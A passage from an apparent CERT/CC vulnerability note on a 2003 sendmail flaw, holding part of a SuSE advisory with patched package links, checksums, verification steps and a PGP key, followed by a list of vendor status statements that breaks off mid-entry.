``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-8.12.6-109.i586.patch.rpm>` \n` f90dc4e6f63b5c4e368e5db2fe7d09be` \n` source rpm(s):` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/sendmail-8.12.6-109.src.rpm>` \n` dd838b1089f6686a1107e6d8159b1f98` \n \n` SuSE-8.0:` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/sendmail-8.12.3-75.i386.rpm>` \n` 9e6949e973085ae3b628c52cadcc2c9e` \n` patch rpm(s):` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/sendmail-8.12.3-75.i386.patch.rpm>` \n` dac55a8afcb2487b8b80549b9a4d7b38` \n` source rpm(s):` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/sendmail-8.12.3-75.src.rpm>` \n` f6e8297e885d367a73ff9010a6cbb297` \n \n` SuSE-7.3:` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/sendmail-8.11.6-164.i386.rpm>` \n` 7591a1d397e161225b4d594bcfc5bb02` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/sec2/sendmail-tls-8.11.6-166.i386.rpm>` \n` 52c213438e8782af09a4395d402d1fea` \n` source rpm(s):` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/sendmail-8.11.6-164.src.rpm>` \n` a7b6f85673913089758f0ef0208aac6a` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/sendmail-tls-8.11.6-166.src.rpm>` \n` 96cbfc4f2d85bdae71196ee80a4ebbd3` \n \n` SuSE-7.2:` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/sendmail-8.11.3-108.i386.rpm>` \n` b107d5a44b234222de7e5fcb7998c192` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/sec2/sendmail-tls-8.11.3-112.i386.rpm>` \n` 78a987bd0a38d067a8cffd6c6003abd8` \n` source rpm(s):` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/sendmail-8.11.3-108.src.rpm>` \n` 0a86a2d3158110479c44c6b8a09f2bb6` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/sendmail-tls-8.11.3-112.src.rpm>` \n` acf234a4fa14d9d078df10cd774da0ce` \n \n` SuSE-7.1:` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/sendmail-8.11.2-45.i386.rpm>` \n` abec9a5d08d89cabc662708b38cadfad` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.1/sec2/sendmail-tls-8.11.2-47.i386.rpm>` \n` 36ab02484b69d9f6ac9d58b78cc0569d` \n` source rpm(s):` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/sendmail-8.11.2-45.src.rpm>` \n` e7e267fbb800277472f797f351796c6d` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/sendmail-tls-8.11.2-47.src.rpm>` \n` 83b8fae134f192c53fa32c2d73f8dc8c` \n \n \n \n` Sparc Platform:` \n \n` SuSE-7.3:` \n` ``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/sendmail-8.11.6-65.sparc.rpm>` \n` f3a9cff90e3ac9493bcab36b11dc692c` \n` ``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/sec2/sendmail-tls-8.11.6-65.sparc.rpm>` \n` 63c14d646d8046df26c2899c0886bb24` \n` source rpm(s):` \n` ``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/sendmail-8.11.6-65.src.rpm>` \n` 7f01e6aa454231f35f6ee50958bb6f29` \n` ``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/sendmail-tls-8.11.6-65.src.rpm>` \n` e9086795f386471e6b2476febb419aa0` \n \n \n \n \n` AXP Alpha Platform:` \n \n` SuSE-7.1:` \n` Limited package building resources are delaying the availiability of` \n` update packages for the SuSE Linux 7.1 for Alpha distribution.` \n \n \n` PPC Power PC Platform:` \n \n` SuSE-7.3:` \n` ``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n1/sendmail-8.11.6-123.ppc.rpm>` \n` 1dd1154f1b9ede1dc003be26919b4d23` \n` ``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/sec2/sendmail-tls-8.11.6-122.ppc.rpm>` \n` a83a7f0885deb049a5a63d8114e47af4` \n` source rpm(s):` \n` ``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/sendmail-8.11.6-123.src.rpm>` \n` 2a199a60d825c8d3d2a1514fb58aea59` \n` ``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/sendmail-tls-8.11.6-122.src.rpm>` \n` 621c390fbb8c44ffb1764d369c096d3f` \n \n` SuSE-7.1:` \n` ``<ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n1/sendmail-8.11.2-34.ppc.rpm>` \n` c1657f4dbc2f4967fb3ca04c17e2f1f3` \n` ``<ftp://ftp.suse.com/pub/suse/ppc/update/7.1/sec2/sendmail-tls-8.11.2-38.ppc.rpm>` \n` 7f564cc83d85970cd7c0f61896c916e6` \n` source rpm(s):` \n` ``<ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/sendmail-8.11.2-34.src.rpm>` \n` bd749453da2ff7513f09798d8b0b2e56` \n` ``<ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/sendmail-tls-8.11.2-38.src.rpm>` \n` 1c347e9052b1b7dd02ae6630c56445db` \n \n \n`______________________________________________________________________________` \n \n`2) Pending vulnerabilities in SuSE Distributions and Workarounds:` \n \n` - glibc` \n` SuSE Security is working on glibc updates for the RPC XDR integer overflow` \n` security problem in glibc. The central function of the glibc package in a` \n` Linux system requires extensive testing of the update packages. The update` \n` packages will be provided for download at the usual location and` \n` publically announced as soon as the testing is completed successfully.` \n \n` - vnc` \n` VNC (Virtual Network Computing) uses a weak cookie generation process` \n` which can be exploited by an attacker to bypass authentication.` \n` New packages are currently being tested and will be available on our` \n` FTP servers soon.` \n \n` - openssl` \n` A paper regarding remote timing attacks against OpenSSL has been` \n` published by researchers of the Stanford University. It is possible` \n` to extract the private RSA key used by services using OpenSSL by` \n` observing their timing behavior. Fixed packages will be available` \n` on our FTP servers soon.` \n`______________________________________________________________________________` \n \n`3) standard appendix: authenticity verification, additional information` \n \n` - Package authenticity verification:` \n \n` SuSE update packages are available on many mirror ftp servers all over` \n` the world. While this service is being considered valuable and important` \n` to the free and open source software community, many users wish to be` \n` sure about the origin of the package and its content before installing` \n` the package. There are two verification methods that can be used` \n` independently from each other to prove the authenticity of a downloaded` \n` file or rpm package:` \n` 1) md5sums as provided in the (cryptographically signed) announcement.` \n` 2) using the internal gpg signatures of the rpm package.` \n \n` 1) execute the command` \n` md5sum <name-of-the-file.rpm>` \n` after you downloaded the file from a SuSE ftp server or its mirrors.` \n` Then, compare the resulting md5sum with the one that is listed in the` \n` announcement. Since the announcement containing the checksums is` \n` cryptographically signed (usually using the key security@suse.de),` \n` the checksums show proof of the authenticity of the package.` \n` We disrecommend to subscribe to security lists which cause the` \n` email message containing the announcement to be modified so that` \n` the signature does not match after transport through the mailing` \n` list software.` \n` Downsides: You must be able to verify the authenticity of the` \n` announcement in the first place. If RPM packages are being rebuilt` \n` and a new version of a package is published on the ftp server, all` \n` md5 sums for the files are useless.` \n \n` 2) rpm package signatures provide an easy way to verify the authenticity` \n` of an rpm package. Use the command` \n` rpm -v --checksig <file.rpm>` \n` to verify the signature of the package, where <file.rpm> is the` \n` filename of the rpm package that you have downloaded. Of course,` \n` package authenticity verification can only target an un-installed rpm` \n` package file.` \n` Prerequisites:` \n` a) gpg is installed` \n` b) The package is signed using a certain key. The public part of this` \n` key must be installed by the gpg program in the directory` \n` ~/.gnupg/ under the user's home directory who performs the` \n` signature verification (usually root). You can import the key` \n` that is used by SuSE in rpm packages for SuSE Linux by saving` \n` this announcement to a file (\"announcement.txt\") and` \n` running the command (do \"su -\" to be root):` \n` gpg --batch; gpg < announcement.txt | gpg --import` \n` SuSE Linux distributions version 7.1 and thereafter install the` \n` key \"build@suse.de\" upon installation or upgrade, provided that` \n` the package gpg is installed. The file containing the public key` \n` is placed at the top-level directory of the first CD (pubring.gpg)` \n` and at ``<ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de>`` .` \n \n \n` - SuSE runs two security mailing lists to which any interested party may` \n` subscribe:` \n \n` suse-security@suse.com` \n` - general/linux/SuSE security discussion.` \n` All SuSE security announcements are sent to this list.` \n` To subscribe, send an email to` \n` <suse-security-subscribe@suse.com>.` \n \n` suse-security-announce@suse.com` \n` - SuSE's announce-only mailing list.` \n` Only SuSE's security announcements are sent to this list.` \n` To subscribe, send an email to` \n` <suse-security-announce-subscribe@suse.com>.` \n \n` For general information or the frequently asked questions (faq)` \n` send mail to:` \n` <suse-security-info@suse.com> or` \n` <suse-security-faq@suse.com> respectively.` \n \n` =====================================================================` \n` SuSE's security contact is <security@suse.com> or <security@suse.de>.` \n` The <security@suse.de> public key is listed below.` \n` =====================================================================` \n`______________________________________________________________________________` \n \n` The information in this advisory may be distributed or reproduced,` \n` provided that the advisory is not modified in any way. In particular,` \n` it is desired that the clear-text signature shows proof of the` \n` authenticity of the text.` \n` SuSE Linux AG makes no warranties of any kind whatsoever with respect` \n` to the information contained in this security advisory.` \n \n`Type Bits/KeyID Date User ID` \n`pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de>` \n`pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de>` \n \n`- -----BEGIN PGP PUBLIC KEY BLOCK-----` \n`Version: GnuPG v1.0.6 (GNU/Linux)` \n`Comment: For info see ``<http://www.gnupg.org>` \n \n`mQGiBDnu9IERBACT8Y35+2vv4MGVKiLEMOl9GdST6MCkYS3yEKeueNWc+z/0Kvff` \n`4JctBsgs47tjmiI9sl0eHjm3gTR8rItXMN6sJEUHWzDP+Y0PFPboMvKx0FXl/A0d` \n`M+HFrruCgBlWt6FA+okRySQiliuI5phwqkXefl9AhkwR8xocQSVCFxcwvwCglVcO` \n`QliHu8jwRQHxlRE0tkwQQI0D+wfQwKdvhDplxHJ5nf7U8c/yE/vdvpN6lF0tmFrK` \n`XBUX+K7u4ifrZlQvj/81M4INjtXreqDiJtr99Rs6xa0ScZqITuZC4CWxJa9GynBE` \n`D3+D2t1V/f8l0smsuYoFOF7Ib49IkTdbtwAThlZp8bEhELBeGaPdNCcmfZ66rKUd` \n`G5sRA/9ovnc1krSQF2+sqB9/o7w5/q2qiyzwOSTnkjtBUVKn4zLUOf6aeBAoV6NM` \n`CC3Kj9aZHfA+ND0ehPaVGJgjaVNFhPi4x0e7BULdvgOoAqajLfvkURHAeSsxXIoE` \n`myW/xC1sBbDkDUIBSx5oej73XCZgnj/inphRqGpsb+1nKFvF+rQoU3VTRSBQYWNr` \n`YWdlIFNpZ25pbmcgS2V5IDxidWlsZEBzdXNlLmRlPohcBBMRAgAcBQI57vSBBQkD` \n`wmcABAsKAwQDFQMCAxYCAQIXgAAKCRCoTtronIAKyl8sAJ98BgD40zw0GHJHIf6d` \n`NfnwI2PAsgCgjH1+PnYEl7TFjtZsqhezX7vZvYCIRgQQEQIABgUCOnBeUgAKCRCe` \n`QOMQAAqrpNzOAKCL512FZvv4VZx94TpbA9lxyoAejACeOO1HIbActAevk5MUBhNe` \n`LZa/qM2JARUDBRA6cGBvd7LmAD0l09kBATWnB/9An5vfiUUE1VQnt+T/EYklES3t` \n`XXaJJp9pHMa4fzFa8jPVtv5UBHGee3XoUNDVwM2OgSEISZxbzdXGnqIlcT08TzBU` \n`D9i579uifklLsnr35SJDZ6ram51/CWOnnaVhUzneOA9gTPSr+/fT3WeVnwJiQCQ3` \n`0kNLWVXWATMnsnT486eAOlT6UNBPYQLpUprF5Yryk23pQUPAgJENDEqeU6iIO9Ot` \n`1ZPtB0lniw+/xCi13D360o1tZDYOp0hHHJN3D3EN8C1yPqZd5CvvznYvB6bWBIpW` \n`cRgdn2DUVMmpU661jwqGlRz1F84JG/xe4jGuzgpJt9IXSzyohEJB6XG5+D0BiF0E` \n`ExECAB0FAjxqqTQFCQoAgrMFCwcKAwQDFQMCAxYCAQIXgAAKCRCoTtronIAKyp1f` \n`AJ9dR7saz2KPNwD3U+fy/0BDKXrYGACfbJ8fQcJqCBQxeHvt9yMPDVq0B0W5Ag0E` \n`Oe70khAIAISR0E3ozF/la+oNaRwxHLrCet30NgnxRROYhPaJB/Tu1FQokn2/Qld/` \n`HZnh3TwhBIw1FqrhWBJ7491iAjLR9uPbdWJrn+A7t8kSkPaF3Z/6kyc5a8fas44h` \n`t5h+6HMBzoFCMAq2aBHQRFRNp9Mz1ZvoXXcI1lk1l8OqcUM/ovXbDfPcXsUVeTPT` \n`tGzcAi2jVl9hl3iwJKkyv/RLmcusdsi8YunbvWGFAF5GaagYQo7YlF6UaBQnYJTM` \n`523AMgpPQtsKm9o/w9WdgXkgWhgkhZEeqUS3m5xNey1nLu9iMvq9M/iXnGz4sg6Q` \n`2Y+GqZ+yAvNWjRRou3zSE7Bzg28MI4sAAwYH/2D71Xc5HPDgu87WnBFgmp8MpSr8` \n`QnSs0wwPg3xEullGEocolSb2c0ctuSyeVnCttJMzkukL9TqyF4s/6XRstWirSWaw` \n`JxRLKH6Zjo/FaKsshYKf8gBkAaddvpl3pO0gmUYbqmpQ3xDEYlhCeieXS5MkockQ` \n`1sj2xYdB1xO0ExzfiCiscUKjUFy+mdzUsUutafuZ+gbHog1CN/ccZCkxcBa5IFCH` \n`ORrNjq9pYWlrxsEn6ApsG7JJbM2besW1PkdEoxak74z1senh36m5jQvVjA3U4xq1` \n`wwylxadmmJaJHzeiLfb7G1ZRjZTsB7fyYxqDzMVul6o9BSwO/1XsIAnV1uuITAQY` \n`EQIADAUCOe70kgUJA8JnAAAKCRCoTtronIAKyksiAJsFB3/77SkH3JlYOGrEe1Ol` \n`0JdGwACeKTttgeVPFB+iGJdiwQlxasOfuXyITAQYEQIADAUCPGqpWQUJCgCCxwAK` \n`CRCoTtronIAKyofBAKCSZM2UFyta/fe9WgITK9I5hbxxtQCfX+0ar2CZmSknn3co` \n`SPihn1+OBNyZAQ0DNuEtBAAAAQgAoCRcd7SVZEFcumffyEwfLTcXQjhKzOahzxpo` \n`omuF+HIyU4AGq+SU8sTZ/1SsjhdzzrSAfv1lETACA+3SmLr5KV40Us1w0UC64cwt` \n`A46xowVq1vMlH2Lib+V/qr3b1hE67nMHjysECVx9Ob4gFuKNoR2eqnAaJvjnAT8J` \n`/LoUC20EdCHUqn6v+M9t/WZgC+WNR8cq69uDy3YQhDP/nIan6fm2uf2kSV9A7ZxE` \n`GrwsWl/WX5Q/sQqMWaU6r4az98X3z90/cN+eJJ3vwtA+rm+nxEvyev+jaLuOQBDf` \n`ebh/XA4FZ35xmi+spdiVeJH4F/ubaGlmj7+wDOF3suYAPSXT2QAFEbQlU3VTRSBT` \n`ZWN1cml0eSBUZWFtIDxzZWN1cml0eUBzdXNlLmRlPokBFQMFEDbhLUfkWLKHsco8` \n`RQEBVw4H/1vIdiOLX/7hdzYaG9crQVIk3QwaB5eBbjvLEMvuCZHiY2COUg5QdmPQ` \n`8SlWNZ6k4nu1BLcv2g/pymPUWP9fG4tuSnlUJDrWGm3nhyhAC9iudP2u1YQY37Gb` \n`B6NPVaZiYMnEb4QYFcqv5c/r2ghSXUTYk7etd6SW6WCOpEqizhx1cqDKNZnsI/1X` \n`11pFcO2N7rc6byDBJ1T+cK+F1Ehan9XBt/shryJmv04nli5CXQMEbiqYYMOu8iaA` \n`8AWRgXPCWqhyGhcVD3LRhUJXjUOdH4ZiHCXaoF3zVPxpeGKEQY8iBrDeDyB3wHmj` \n`qY9WCX6cmogGQRgYG6yJqDalLqrDOdmJARUDBRA24S0Ed7LmAD0l09kBAW04B/4p` \n`WH3f1vQn3i6/+SmDjGzUu2GWGq6Fsdwo2hVM2ym6CILeow/K9JfhdwGvY8LRxWRL` \n`hn09j2IJ9P7H1Yz3qDf10AX6V7YILHtchKT1dcngCkTLmDgC4rs1iAAl3f089sRG` \n`BafGPGKv2DQjHfR1LfRtbf0P7c09Tkej1MP8HtQMW9hPkBYeXcwbCjdrVGFOzqx+` \n`AvvJDdT6a+oyRMTFlvmZ83UV5pgoyimgjhWnM1V4bFBYjPrtWMkdXJSUXbR6Q7Pi` \n`RZWCzGRzwbaxqpl3rK/YTCphOLwEMB27B4/fcqtBzgoMOiaZA0M5fFoo54KgRIh0` \n`zinsSx2OrWgvSiLEXXYKiEYEEBECAAYFAjseYcMACgkQnkDjEAAKq6ROVACgjhDM` \n`/3KM+iFjs5QXsnd4oFPOnbkAnjYGa1J3em+bmV2aiCdYXdOuGn4ZiQCVAwUQN7c7` \n`whaQN/7O/JIVAQEB+QP/cYblSAmPXxSFiaHWB+MiUNw8B6ozBLK0QcMQ2YcL6+Vl` \n`D+nSZP20+Ja2nfiKjnibCv5ss83yXoHkYk2Rsa8foz6Y7tHwuPiccvqnIC/c9Cvz` \n`dbIsdxpfsi0qWPfvX/jLMpXqqnPjdIZErgxpwujas1n9016PuXA8K3MJwVjCqSKI` \n`RgQQEQIABgUCOhpCpAAKCRDHUqoysN/3gCt7AJ9adNQMbmA1iSYcbhtgvx9ByLPI` \n`DgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE=` \n`=LRKC` \n`- -----END PGP PUBLIC KEY BLOCK-----` \n \n`Roman Drahtm\u00fcller,` \n`SuSE Security.` \n`- --` \n` - -` \n`| Roman Drahtm\u00fcller <draht@suse.de> // \"You don't need eyes to see, |` \n` SuSE Linux AG - Security Phone: // you need vision!\"` \n`| N\u00fcrnberg, Germany +49-911-740530 // Maxi Jazz, Faithless |` \n` - -` \n \n`-----BEGIN PGP SIGNATURE-----` \n`Version: 2.6.3in` \n`Charset: noconv` \n \n`iQEVAwUBPonCaHey5gA9JdPZAQHVjQgAmVxPZOj3YOGkPYHvAOxIWd6LI29BcbtF` \n`7OYY9j7qofdZdHmAjYS/tW9SveuhoOzWNrZYWMKUSpFZoy5hkqYkVa9MPtTgKRST` \n`+Yle2PM2KrNzvUdEYeNypD4feE7qZKmO3XVub5j53bPYEa6dOWCrF7UrOv1LPnGE` \n`x7Ffn9eYQW09Xqs9xp5GSJevz7qN2KT5XS76/XWqQgc3Pv8BXEAYZTISe8xk6dOc` \n`vjgQx7AcmZBLVV3fl+hF4OgTgT0vBcDxta8t1Fm0YexP2h/ObKBWvo8pV4gDAmBT` \n`esitAhzgU0dbEl3JkueOjqLs7JM09MESi/tqu2aOM1EgL/onSJi3Xw==` \n`=x4bK` \n`-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Sun Microsystems Inc.\n\nNotified: March 29, 2003 Updated: March 31, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSolaris 2.6, 7, 8 and 9 are vulnerable to VU#897604.\n\nSun will be publishing a Sun Alert for the issue at the following location shortly: \n \n<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/52620> \n \nThe Sun Alert will be updated with the patch information as soon as the patches are available. \n \nAt that time, the patches listed in the Sun Alert will be available from: \n \n<http://sunsolve.sun.com/securitypatch>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ The Sendmail Consortium\n\nUpdated: March 29, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe Sendmail Consortium recommends that sites upgrade to 8.12.9 whenever possible. Alternatively, patches are available for 8.9, 8.10, 8.11, and 8.12 on <http://www.sendmail.org/>.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Wind River Systems Inc.\n\nNotified: March 29, 2003 Updated: March 30, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThis vulnerability is addressed by the M500-008 patch for Platform for Server Appliances 1.0 or BSD/OS 5.0 based systems. The M31--005 patch addresses this problem for BSD/OS 4.3.1 or 4.3 systems, and the M420-034 addresses this problem for BSD/OS 4.2 based systems.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Wirex\n\nNotified: March 29, 2003 Updated: April 02, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n<<http://www.securityfocus.com/archive/1/317135/2003-03-30/2003-04-05/0>>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Hitachi\n\nNotified: March 29, 2003 Updated: May 20, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nHI-UX/WE2's sendmail is NOT Vulnerable to this issue.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Lotus Software\n\nNotified: March 29, 2003 Updated: April 01, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nLotus products are not vulnerable to this problem.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ AT&T\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Alcatel\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Avaya\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Check Point\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Cisco Systems Inc.\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Computer Associates\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Cray Inc.\n\nNotified: March 29, 2003 Updated: March 31, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nCray Inc. may be vulnerable and has opened sprs 725085 and 725086 to investigate.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Data General\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Guardian Digital Inc.\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Juniper Networks\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Lucent Technologies\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Microsoft Corporation\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ MontaVista Software\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ NEC Corporation\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Nokia\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Novell\n\nNotified: March 29, 2003 Updated: March 29, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe 